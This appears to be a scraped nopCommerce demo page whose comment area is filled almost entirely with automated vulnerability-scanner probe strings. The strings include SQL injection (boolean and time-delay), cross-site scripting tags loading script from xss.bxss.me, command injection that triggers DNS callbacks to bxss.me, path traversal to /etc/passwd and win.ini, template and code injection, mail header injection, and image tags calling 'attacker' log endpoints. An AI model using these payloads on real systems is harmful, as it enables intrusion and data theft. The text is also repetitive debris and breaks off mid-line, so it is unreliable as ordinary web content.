For full feature list go to nopCommerce.com
Providing outstanding custom search engine optimization, web development services and e-commerce development solutions to our clients at a fair price in a professional manner.
This is a sample comment...
555
1RafMMbnO
-1 OR 2+595-595-1=0+0+0+1 --
-1 OR 2+663-663-1=0+0+0+1
response.write(9692977*9416208)
-1' OR 2+293-293-1=0+0+0+1 --
/../../../../../../../../../../windows/system32/BITSADMIN.exe
l2q2SV8n
echo lvievx$()\ bkdbzw\nz^xyu||a #' &echo lvievx$()\ bkdbzw\nz^xyu||a #|" &echo lvievx$()\ bkdbzw\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
'+response.write(9692977*9416208)+'
555bcc:074625.678-3727.678.8b6ca.19270.2@bxss.me
"+response.write(9692977*9416208)+"
-1' OR 2+654-654-1=0+0+0+1 or 'K8JRUL3c'='
555<esi:include src="http://bxss.me/rpb.png"/>
&echo conlcs$()\ gggydo\nz^xyu||a #' &echo conlcs$()\ gggydo\nz^xyu||a #|" &echo conlcs$()\ gggydo\nz^xyu||a #
${9999598+10000480}
../../../../../../../../../../../../../../windows/win.ini
to@example.com>bcc:074625.678-3732.678.8b6ca.19270.2@bxss.me
-1" OR 2+154-154-1=0+0+0+1 --
file:///etc/passwd
|echo nfvbzj$()\ cihzqz\nz^xyu||a #' |echo nfvbzj$()\ cihzqz\nz^xyu||a #|" |echo nfvbzj$()\ cihzqz\nz^xyu||a #
if(now()=sysdate(),sleep(15),0)
(nslookup hitydkniuyytp56d80.bxss.me||perl -e "gethostbyname('hitydkniuyytp56d80.bxss.me')")
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
$(nslookup hitjjkpfqdzfu61f9a.bxss.me||perl -e "gethostbyname('hitjjkpfqdzfu61f9a.bxss.me')")
../555
555&n956804=v942015
)
&nslookup hitqmiywtzgwd5f6d8.bxss.me&'\"`0&nslookup hitqmiywtzgwd5f6d8.bxss.me&`'
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
!(()&&!|*|*|
&(nslookup hitgolgotjftc22e64.bxss.me||perl -e "gethostbyname('hitgolgotjftc22e64.bxss.me')")&'\"`0&(nslookup hitgolgotjftc22e64.bxss.me||perl -e "gethostbyname('hitgolgotjftc22e64.bxss.me')")&`'
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
/etc/shells
c:/windows/win.ini
^(#$!@#$)(()))******
|(nslookup hitjiivwjehvt46abe.bxss.me||perl -e "gethostbyname('hitjiivwjehvt46abe.bxss.me')")
bxss.me
'"()
-1; waitfor delay '0:0:15' --
`(nslookup hitqunafavsgq83185.bxss.me||perl -e "gethostbyname('hitqunafavsgq83185.bxss.me')")`
'.gethostbyname(lc('hitfv'.'qnotryjz01e9a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(75).chr(111).chr(78).'
".gethostbyname(lc("hitqw"."yklxiidva32a6.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(82).chr(107).chr(85)."
;(nslookup hitqznlezkttgb8b00.bxss.me||perl -e "gethostbyname('hitqznlezkttgb8b00.bxss.me')")|(nslookup hitqznlezkttgb8b00.bxss.me||perl -e "gethostbyname('hitqznlezkttgb8b00.bxss.me')")&(nslookup hitqznlezkttgb8b00.bxss.me||perl -e "gethostbyname('hitqznlezkttgb8b00.bxss.me')")
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555'&&sleep(27*1000)*mdlhqq&&'
-1); waitfor delay '0:0:15' --
555"&&sleep(27*1000)*fmesyg&&"
HttP://bxss.me/t/xss.html?%00
';print(md5(31337));$a='
555'||sleep(27*1000)*tjgkas||'
bxss.me/t/xss.html?%00
555"||sleep(27*1000)*pboety||"
";print(md5(31337));$a="
-1)); waitfor delay '0:0:15' --
${@print(md5(31337))}
1 waitfor delay '0:0:15' --
${@print(md5(31337))}\
"+"A".concat(70-3).concat(22*4).concat(112).concat(82).concat(119).concat(78)+(require"socket"Socket.gethostbyname("hitdn"+"elpiksggdc1e6.bxss.me.")[3].to_s)+"
'.print(md5(31337)).'
'+'A'.concat(70-3).concat(22*4).concat(110).concat(71).concat(105).concat(89)+(require'socket'Socket.gethostbyname('hitnw'+'rsrghitq3bc2e.bxss.me.')[3].to_s)+'
esr3KNgJ'; waitfor delay '0:0:15' --
about-nopcommerce
about-nopcommerce/.
idXTeFec'); waitfor delay '0:0:15' --
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
UZgR1F7q')); waitfor delay '0:0:15' --
xfs.bxss.me
-5 OR 743=(SELECT 743 FROM PG_SLEEP(15))--
'"
-5) OR 321=(SELECT 321 FROM PG_SLEEP(15))--
<!--
555'"()&%<zzz><ScRiPt >J81P(9744)</ScRiPt>
-1)) OR 437=(SELECT 437 FROM PG_SLEEP(15))--
'"()&%<zzz><ScRiPt >J81P(9393)</ScRiPt>
5559149312
GLDAVOfo' OR 942=(SELECT 942 FROM PG_SLEEP(15))--
bfg6477<s1﹥s2ʺs3ʹhjl6477
bfgx6801%C0%BEz1%C0%BCz2a%90bcxhjl6801
wFAvqinI') OR 501=(SELECT 501 FROM PG_SLEEP(15))--
9EBldFDS')) OR 775=(SELECT 775 FROM PG_SLEEP(15))--
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
dfb__${98991*97996}__::.x
1'"
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >J81P(9148)</ScRiPt>
555<WZMY6G>HKYFZ[!+!]</WZMY6G>
@@kOuen
555<script>J81P(9034)</script>
555<ScR<ScRiPt>IpT>J81P(9744)</sCr<ScRiPt>IpT>
555<ScRiPt >J81P(9537)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9706></ScRiPt>
555<isindex type=image src=1 onerror=J81P(9251)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9340'>
555<body onload=J81P(9831)>
555<img src=//xss.bxss.me/t/dot.gif onload=J81P(9056)>
555<img src=xyz OnErRor=J81P(9715)>
555<img/src=">" onerror=alert(9980)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%4A%38%31%50%289725%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\J81P(9140)\u003C/sCripT\u003E
555<ScRiPt>J81P(9221)</sCripT>
%F6<img zzz onmouseover=J81P(99481) //%F6>
555<input autofocus onfocus=J81P(9322)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(J81P(9175))}
555qM4fa<ScRiPt >J81P(9617)</ScRiPt>
555<WDYZKQ>QAZDA[!+!]</WDYZKQ>
555<ifRAme sRc=9994.com></IfRamE>
555<aMrzYiW x=9091>
555<img sRc='http://attacker-9303/log.php?
555<a8v7qrB<
-1 OR 2+466-466-1=0+0+0+1 --
-1 OR 2+907-907-1=0+0+0+1
-1' OR 2+116-116-1=0+0+0+1 --
-1' OR 2+736-736-1=0+0+0+1 or '5b42jiJv'='
-1" OR 2+904-904-1=0+0+0+1 --
555'"()&%<zzz><ScRiPt >jXUi(9615)</ScRiPt>
'"()&%<zzz><ScRiPt >jXUi(9371)</ScRiPt>
5559463143
VIEnqU3T'; waitfor delay '0:0:15' --
TD4gOsH0'); waitfor delay '0:0:15' --
BfhxpFML')); waitfor delay '0:0:15' --
-5 OR 439=(SELECT 439 FROM PG_SLEEP(15))--
-5) OR 473=(SELECT 473 FROM PG_SLEEP(15))--
-1)) OR 853=(SELECT 853 FROM PG_SLEEP(15))--
0jw0ZgD7' OR 108=(SELECT 108 FROM PG_SLEEP(15))--
rxAhloGm') OR 662=(SELECT 662 FROM PG_SLEEP(15))--
vwYAe5In')) OR 835=(SELECT 835 FROM PG_SLEEP(15))--
response.write(9282058*9279304)
'+response.write(9282058*9279304)+'
"+response.write(9282058*9279304)+"
echo dnliif$()\ tfqerl\nz^xyu||a #' &echo dnliif$()\ tfqerl\nz^xyu||a #|" &echo dnliif$()\ tfqerl\nz^xyu||a #
&echo vuecvh$()\ zwvkrx\nz^xyu||a #' &echo vuecvh$()\ zwvkrx\nz^xyu||a #|" &echo vuecvh$()\ zwvkrx\nz^xyu||a #
|echo xreuwd$()\ dzfanj\nz^xyu||a #' |echo xreuwd$()\ dzfanj\nz^xyu||a #|" |echo xreuwd$()\ dzfanj\nz^xyu||a #
(nslookup hitpsvhigpchtc6147.bxss.me||perl -e "gethostbyname('hitpsvhigpchtc6147.bxss.me')")
$(nslookup hitueiuvnfeqv12c01.bxss.me||perl -e "gethostbyname('hitueiuvnfeqv12c01.bxss.me')")
&nslookup hitszrlnoonbe0a2b7.bxss.me&'\"`0&nslookup hitszrlnoonbe0a2b7.bxss.me&`'
&(nslookup hitmilnrlrporedfd8.bxss.me||perl -e "gethostbyname('hitmilnrlrporedfd8.bxss.me')")&'\"`0&(nslookup hitmilnrlrporedfd8.bxss.me||perl -e "gethostbyname('hitmilnrlrporedfd8.bxss.me')")&`'
@@IT1yP
|(nslookup hitesdisdebcoe8363.bxss.me||perl -e "gethostbyname('hitesdisdebcoe8363.bxss.me')")
`(nslookup hitwajeqnziclba920.bxss.me||perl -e "gethostbyname('hitwajeqnziclba920.bxss.me')")`
;(nslookup hitteiapohnzkc2c0c.bxss.me||perl -e "gethostbyname('hitteiapohnzkc2c0c.bxss.me')")|(nslookup hitteiapohnzkc2c0c.bxss.me||perl -e "gethostbyname('hitteiapohnzkc2c0c.bxss.me')")&(nslookup hitteiapohnzkc2c0c.bxss.me||perl -e "gethostbyname('hitteiapohnzkc2c0c.bxss.me')")
d6cbhSTG
555bcc:074625.678-8750.678.8b6ca.19270.2@bxss.me
to@example.com>bcc:074625.678-8751.678.8b6ca.19270.2@bxss.me
${9999129+9999217}
555&n949553=v941391
555'&&sleep(27*1000)*anybva&&'
555"&&sleep(27*1000)*pveeqw&&"
555'||sleep(27*1000)*obtrlf||'
555"||sleep(27*1000)*dtwrcj||"
'.gethostbyname(lc('hitjs'.'puxsesxm80577.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(71).chr(119).chr(89).'
".gethostbyname(lc("hitxo"."hiuyvbxa2ce10.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(69).chr(104).chr(75)."
"+"A".concat(70-3).concat(22*4).concat(114).concat(90).concat(103).concat(86)+(require"socket"Socket.gethostbyname("hitdr"+"ljnrnzfe1426b.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(122).concat(79).concat(101).concat(82)+(require'socket'Socket.gethostbyname('hitpj'+'pfpbhpve2b87d.bxss.me.')[3].to_s)+'
555'"()&%<zzz><ScRiPt >XUh3(9356)</ScRiPt>
'"()&%<zzz><ScRiPt >XUh3(9777)</ScRiPt>
5559131262
bfg1723<s1﹥s2ʺs3ʹhjl1723
bfgx6451%C0%BEz1%C0%BCz2a%90bcxhjl6451
555<ScRiPt >XUh3(9619)</ScRiPt>
555<WW7WJH>C9BSC[!+!]</WW7WJH>
555<script>XUh3(9760)</script>
555<ScR<ScRiPt>IpT>XUh3(9941)</sCr<ScRiPt>IpT>
555<ScRiPt >XUh3(9875)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9831></ScRiPt>
555<isindex type=image src=1 onerror=XUh3(9644)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9357'>
555<body onload=XUh3(9860)>
555<img src=//xss.bxss.me/t/dot.gif onload=XUh3(9038)>
555<img src=xyz OnErRor=XUh3(9618)>
555<img/src=">" onerror=alert(9268)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%58%55%68%33%289614%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\XUh3(9464)\u003C/sCripT\u003E
555<ScRiPt>XUh3(9657)</sCripT>
%F6<img zzz onmouseover=XUh3(96111) //%F6>
555<input autofocus onfocus=XUh3(9515)>
555}body{zzz:Expre/**/SSion(XUh3(9813))}
555odkX0<ScRiPt >XUh3(9189)</ScRiPt>
555<WLPOYQ>BOHDQ[!+!]</WLPOYQ>
555<ifRAme sRc=9089.com></IfRamE>
555<a599LLY x=9061>
555<img sRc='http://attacker-9814/log.php?
555<arjNVSY<
555'"()&%<zzz><ScRiPt >BMSE(9341)</ScRiPt>
'"()&%<zzz><ScRiPt >BMSE(9141)</ScRiPt>
5559630345
bfg7274<s1﹥s2ʺs3ʹhjl7274
bfgx3189%C0%BEz1%C0%BCz2a%90bcxhjl3189
555<ScRiPt >BMSE(9554)</ScRiPt>
555<WAYFPV>J2USQ[!+!]</WAYFPV>
555<script>BMSE(9992)</script>
555<ScR<ScRiPt>IpT>BMSE(9722)</sCr<ScRiPt>IpT>
555<ScRiPt >BMSE(9216)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9404></ScRiPt>
555<isindex type=image src=1 onerror=BMSE(9581)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9487'>
555<body onload=BMSE(9868)>
555<img src=//xss.bxss.me/t/dot.gif onload=BMSE(9133)>
555<img src=xyz OnErRor=BMSE(9220)>
555<img/src=">" onerror=alert(9678)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%42%4D%53%45%289458%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\BMSE(9755)\u003C/sCripT\u003E
555<ScRiPt>BMSE(9473)</sCripT>
%F6<img zzz onmouseover=BMSE(94481) //%F6>
555<input autofocus onfocus=BMSE(9571)>
555}body{zzz:Expre/**/SSion(BMSE(9790))}
555VxDBS<ScRiPt >BMSE(9475)</ScRiPt>
555<W1ADTP>KANKB[!+!]</W1ADTP>
555<ifRAme sRc=9390.com></IfRamE>
555<aCABdaW x=9182>
555<img sRc='http://attacker-9596/log.php?
555<apu0mcq<
555'"()&%<zzz><ScRiPt >wsbA(9278)</ScRiPt>
'"()&%<zzz><ScRiPt >wsbA(9376)</ScRiPt>
5559275550
bfg5112<s1﹥s2ʺs3ʹhjl5112
bfgx2772%C0%BEz1%C0%BCz2a%90bcxhjl2772
555<ScRiPt >wsbA(9590)</ScRiPt>
555<WTRRQ4>SJZ7K[!+!]</WTRRQ4>
555<script>wsbA(9039)</script>
555<ScR<ScRiPt>IpT>wsbA(9983)</sCr<ScRiPt>IpT>
555<ScRiPt >wsbA(9913)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9881></ScRiPt>
555<isindex type=image src=1 onerror=wsbA(9196)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9846'>
555<body onload=wsbA(9484)>
555<img src=//xss.bxss.me/t/dot.gif onload=wsbA(9877)>
555<img src=xyz OnErRor=wsbA(9648)>
555<img/src=">" onerror=alert(9715)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%77%73%62%41%289197%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\wsbA(9647)\u003C/sCripT\u003E
555<ScRiPt>wsbA(9075)</sCripT>
%F6<img zzz onmouseover=wsbA(93301) //%F6>
555<input autofocus onfocus=wsbA(9619)>
555}body{zzz:Expre/**/SSion(wsbA(9224))}
555RMgF8<ScRiPt >wsbA(9767)</ScRiPt>
555<WJWHV8>YZLVT[!+!]</WJWHV8>
555<ifRAme sRc=9494.com></IfRamE>
555<a297oW0 x=9415>
555<img sRc='http://attacker-9846/log.php?
555<aoaV2ne<
555'"()&%<zzz><ScRiPt >CRLd(9146)</ScRiPt>
'"()&%<zzz><ScRiPt >CRLd(9319)</ScRiPt>
5559737160
-1 OR 2+455-455-1=0+0+0+1 --
-1 OR 3+455-455-1=0+0+0+1 --
-1 OR 2+161-161-1=0+0+0+1
-1 OR 3+161-161-1=0+0+0+1
-1' OR 2+373-373-1=0+0+0+1 --
-1' OR 3+373-373-1=0+0+0+1 --
-1' OR 2+872-872-1=0+0+0+1 or 'TL1gb2BZ'='
-1' OR 3+872-872-1=0+0+0+1 or 'TL1gb2BZ'='
-1" OR 2+395-395-1=0+0+0+1 --
-1" OR 3+395-395-1=0+0+0+1 --
bfg2152<s1﹥s2ʺs3ʹhjl2152
bfgx2937%C0%BEz1%C0%BCz2a%90bcxhjl2937
response.write(9450153*9307599)
'+response.write(9450153*9307599)+'
"+response.write(9450153*9307599)+"
echo chupdg$()\ qxvwvg\nz^xyu||a #' &echo chupdg$()\ qxvwvg\nz^xyu||a #|" &echo chupdg$()\ qxvwvg\nz^xyu||a #
&echo djtjsz$()\ stubzv\nz^xyu||a #' &echo djtjsz$()\ stubzv\nz^xyu||a #|" &echo djtjsz$()\ stubzv\nz^xyu||a #
|echo oudpuh$()\ ijdguh\nz^xyu||a #' |echo oudpuh$()\ ijdguh\nz^xyu||a #|" |echo oudpuh$()\ ijdguh\nz^xyu||a #
(nslookup hitfvrstvyahh3f903.bxss.me||perl -e "gethostbyname('hitfvrstvyahh3f903.bxss.me')")
$(nslookup hitdjqtxyyzmz90d0d.bxss.me||perl -e "gethostbyname('hitdjqtxyyzmz90d0d.bxss.me')")
&nslookup hitjgoehrpweg26fe2.bxss.me&'\"`0&nslookup hitjgoehrpweg26fe2.bxss.me&`'
&(nslookup hitzjagtkhvrpf0d13.bxss.me||perl -e "gethostbyname('hitzjagtkhvrpf0d13.bxss.me')")&'\"`0&(nslookup hitzjagtkhvrpf0d13.bxss.me||perl -e "gethostbyname('hitzjagtkhvrpf0d13.bxss.me')")&`'
|(nslookup hittmaletamllfb2cf.bxss.me||perl -e "gethostbyname('hittmaletamllfb2cf.bxss.me')")
`(nslookup hiteumydrmewu776ac.bxss.me||perl -e "gethostbyname('hiteumydrmewu776ac.bxss.me')")`
;(nslookup hitgxyekvylmac701b.bxss.me||perl -e "gethostbyname('hitgxyekvylmac701b.bxss.me')")|(nslookup hitgxyekvylmac701b.bxss.me||perl -e "gethostbyname('hitgxyekvylmac701b.bxss.me')")&(nslookup hitgxyekvylmac701b.bxss.me||perl -e "gethostbyname('hitgxyekvylmac701b.bxss.me')")
do5LyXnI
../
./
555<ScRiPt >CRLd(9198)</ScRiPt>
555<W1HDMT>CRKGR[!+!]</W1HDMT>
555<script>CRLd(9086)</script>
bcc:074625.678-195605.678.8b6ca.19270.2@bxss.me
to@example.com>bcc:074625.678-195606.678.8b6ca.19270.2@bxss.me
NsaXarZW'; waitfor delay '0:0:15' --
555<ScR<ScRiPt>IpT>CRLd(9388)</sCr<ScRiPt>IpT>
su7XblDg'); waitfor delay '0:0:15' --
<esi:include src="http://bxss.me/rpb.png"/>
555<ScRiPt >CRLd(9470)</ScRiPt>
v5OYM2Mb')); waitfor delay '0:0:15' --
${9999007+9999079}
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9213></ScRiPt>
-5 OR 471=(SELECT 471 FROM PG_SLEEP(15))--
&n998382=v992841
-5) OR 474=(SELECT 474 FROM PG_SLEEP(15))--
555<isindex type=image src=1 onerror=CRLd(9880)>
-1)) OR 180=(SELECT 180 FROM PG_SLEEP(15))--
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9630'>
'&&sleep(27*1000)*astfhn&&'
CsaOIVT1' OR 336=(SELECT 336 FROM PG_SLEEP(15))--
"&&sleep(27*1000)*knyfrv&&"
'||sleep(27*1000)*lnwsfw||'
"||sleep(27*1000)*kgwwmq||"
555<body onload=CRLd(9442)>
iP6BWY5W') OR 179=(SELECT 179 FROM PG_SLEEP(15))--
555<img src=//xss.bxss.me/t/dot.gif onload=CRLd(9425)>
'.gethostbyname(lc('hitie'.'qpmwjyel9b96d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(77).chr(118).chr(88).'
".gethostbyname(lc("hitsx"."jzctbatv990de.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(74).chr(106).chr(84)."
555<img src=xyz OnErRor=CRLd(9453)>
NB3b2cgn')) OR 776=(SELECT 776 FROM PG_SLEEP(15))--
ctimesleepp0(I30tp1Rp2.
555<img/src=">" onerror=alert(9605)>
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
"+"A".concat(70-3).concat(22*4).concat(111).concat(80).concat(117).concat(72)+(require"socket"Socket.gethostbyname("hitiu"+"ipsgcbpo7c32b.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(98).concat(84).concat(113).concat(72)+(require'socket'Socket.gethostbyname('hitdd'+'eqfnagisd3558.bxss.me.')[3].to_s)+'
%35%35%35%3C%53%63%52%69%50%74%20%3E%43%52%4C%64%289568%29%3C%2F%73%43%72%69%70%54%3E
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555\u003CScRiPt\CRLd(9750)\u003C/sCripT\u003E
@@GLe6T
555<ScRiPt>CRLd(9528)</sCripT>
%F6<img zzz onmouseover=CRLd(95571) //%F6>
555<input autofocus onfocus=CRLd(9282)>
'"()&%<zzz><ScRiPt >qhJp(9696)</ScRiPt>
'"()&%<zzz><ScRiPt >qhJp(9405)</ScRiPt>
9299727
bfg6329<s1﹥s2ʺs3ʹhjl6329
bfgx1445%C0%BEz1%C0%BCz2a%90bcxhjl1445
555}body{zzz:Expre/**/SSion(CRLd(9141))}
555kqpH8<ScRiPt >CRLd(9623)</ScRiPt>
555<WWKGMJ>EMF5B[!+!]</WWKGMJ>
555<ifRAme sRc=9485.com></IfRamE>
<ScRiPt >qhJp(9589)</ScRiPt>
555<aqACUaW x=9827>
<WEAHHH>5YXRW[!+!]</WEAHHH>
555<img sRc='http://attacker-9502/log.php?
<script>qhJp(9680)</script>
<ScR<ScRiPt>IpT>qhJp(9493)</sCr<ScRiPt>IpT>
555<ahp2Phc<
<ScRiPt >qhJp(9703)</ScRiPt>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9921></ScRiPt>
<isindex type=image src=1 onerror=qhJp(9705)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9417'>
<body onload=qhJp(9600)>
<img src=//xss.bxss.me/t/dot.gif onload=qhJp(9077)>
<img src=xyz OnErRor=qhJp(9143)>
<img/src=">" onerror=alert(9348)>
%0D%0A%3C%53%63%52%69%50%74%20%3E%71%68%4A%70%289982%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\qhJp(9282)\u003C/sCripT\u003E
<ScRiPt>qhJp(9331)</sCripT>
%F6<img zzz onmouseover=qhJp(99301) //%F6>
<input autofocus onfocus=qhJp(9630)>
}body{zzz:Expre/**/SSion(qhJp(9535))}
qtxwA<ScRiPt >qhJp(9653)</ScRiPt>
<WMRUJ1>PPSU6[!+!]</WMRUJ1>
<ifRAme sRc=9479.com></IfRamE>
<awKeLJl x=9750>
<img sRc='http://attacker-9032/log.php?
<aJxgXCK<


555'"()&%<zzz><ScRiPt >0TwD(9796)</ScRiPt>
'"()&%<zzz><ScRiPt >0TwD(9476)</ScRiPt>
5559999953
bfg2929<s1﹥s2ʺs3ʹhjl2929
bfgx2723%C0%BEz1%C0%BCz2a%90bcxhjl2723
555<ScRiPt >0TwD(9993)</ScRiPt>
555<WIYEGB>PARDZ[!+!]</WIYEGB>
555<script>0TwD(9879)</script>
555<ScR<ScRiPt>IpT>0TwD(9988)</sCr<ScRiPt>IpT>
555<ScRiPt >0TwD(9817)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9811></ScRiPt>
555<isindex type=image src=1 onerror=0TwD(9147)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9791'>
555<body onload=0TwD(9155)>
555<img src=//xss.bxss.me/t/dot.gif onload=0TwD(9804)>
555<img src=xyz OnErRor=0TwD(9038)>
555<img/src=">" onerror=alert(9000)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%30%54%77%44%289460%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\0TwD(9950)\u003C/sCripT\u003E
555<ScRiPt>0TwD(9590)</sCripT>
%F6<img zzz onmouseover=0TwD(98161) //%F6>
555<input autofocus onfocus=0TwD(9563)>
555}body{zzz:Expre/**/SSion(0TwD(9823))}
555QXi0r<ScRiPt >0TwD(9003)</ScRiPt>
555<WCSHST>O5OZU[!+!]</WCSHST>
555<ifRAme sRc=9507.com></IfRamE>
555<aqdNuxk x=9107>
555<img sRc='http://attacker-9099/log.php?
555<aQWzlB4<
This is a sample comment...
555
555
1RafMMbnO
555
555
-1 OR 2+595-595-1=0+0+0+1 --
-1 OR 2+663-663-1=0+0+0+1
response.write(9692977*9416208)
-1' OR 2+293-293-1=0+0+0+1 --
/../../../../../../../../../../windows/system32/BITSADMIN.exe
l2q2SV8n
echo lvievx$()\ bkdbzw\nz^xyu||a #' &echo lvievx$()\ bkdbzw\nz^xyu||a #|" &echo lvievx$()\ bkdbzw\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
'+response.write(9692977*9416208)+'
555
555
bcc:074625.678-3727.678.8b6ca.19270.2@bxss.me
"+response.write(9692977*9416208)+"
555
-1' OR 2+654-654-1=0+0+0+1 or 'K8JRUL3c'='
555<esi:include src="http://bxss.me/rpb.png"/>
555
&echo conlcs$()\ gggydo\nz^xyu||a #' &echo conlcs$()\ gggydo\nz^xyu||a #|" &echo conlcs$()\ gggydo\nz^xyu||a #
555
${9999598+10000480}
../../../../../../../../../../../../../../windows/win.ini
to@example.com>
bcc:074625.678-3732.678.8b6ca.19270.2@bxss.me
-1" OR 2+154-154-1=0+0+0+1 --
555
555
555
file:///etc/passwd
|echo nfvbzj$()\ cihzqz\nz^xyu||a #' |echo nfvbzj$()\ cihzqz\nz^xyu||a #|" |echo nfvbzj$()\ cihzqz\nz^xyu||a #
555
555
if(now()=sysdate(),sleep(15),0)
555
(nslookup hitydkniuyytp56d80.bxss.me||perl -e "gethostbyname('hitydkniuyytp56d80.bxss.me')")
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
$(nslookup hitjjkpfqdzfu61f9a.bxss.me||perl -e "gethostbyname('hitjjkpfqdzfu61f9a.bxss.me')")
../555
555&n956804=v942015
)
&nslookup hitqmiywtzgwd5f6d8.bxss.me&'\"`0&nslookup hitqmiywtzgwd5f6d8.bxss.me&`'
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
!(()&&!|*|*|
&(nslookup hitgolgotjftc22e64.bxss.me||perl -e "gethostbyname('hitgolgotjftc22e64.bxss.me')")&'\"`0&(nslookup hitgolgotjftc22e64.bxss.me||perl -e "gethostbyname('hitgolgotjftc22e64.bxss.me')")&`'
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
/etc/shells
c:/windows/win.ini
^(#$!@#$)(()))******
555
|(nslookup hitjiivwjehvt46abe.bxss.me||perl -e "gethostbyname('hitjiivwjehvt46abe.bxss.me')")
bxss.me
'"()
555
-1; waitfor delay '0:0:15' --
`(nslookup hitqunafavsgq83185.bxss.me||perl -e "gethostbyname('hitqunafavsgq83185.bxss.me')")`
555
'.gethostbyname(lc('hitfv'.'qnotryjz01e9a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(75).chr(111).chr(78).'
555
555
555
555
555
555
".gethostbyname(lc("hitqw"."yklxiidva32a6.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(82).chr(107).chr(85)."
555
;(nslookup hitqznlezkttgb8b00.bxss.me||perl -e "gethostbyname('hitqznlezkttgb8b00.bxss.me')")|(nslookup hitqznlezkttgb8b00.bxss.me||perl -e "gethostbyname('hitqznlezkttgb8b00.bxss.me')")&(nslookup hitqznlezkttgb8b00.bxss.me||perl -e "gethostbyname('hitqznlezkttgb8b00.bxss.me')")
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555'&&sleep(27*1000)*mdlhqq&&'
555
-1); waitfor delay '0:0:15' --
555"&&sleep(27*1000)*fmesyg&&"
555
555
HttP://bxss.me/t/xss.html?%00
555
555
';print(md5(31337));$a='
555'||sleep(27*1000)*tjgkas||'
555
bxss.me/t/xss.html?%00
555"||sleep(27*1000)*pboety||"
555
555
555
";print(md5(31337));$a="
555
-1)); waitfor delay '0:0:15' --
555
555
${@print(md5(31337))}
555
555
1 waitfor delay '0:0:15' --
555
555
${@print(md5(31337))}\
555
555
"+"A".concat(70-3).concat(22*4).concat(112).concat(82).concat(119).concat(78)+(require"socket"
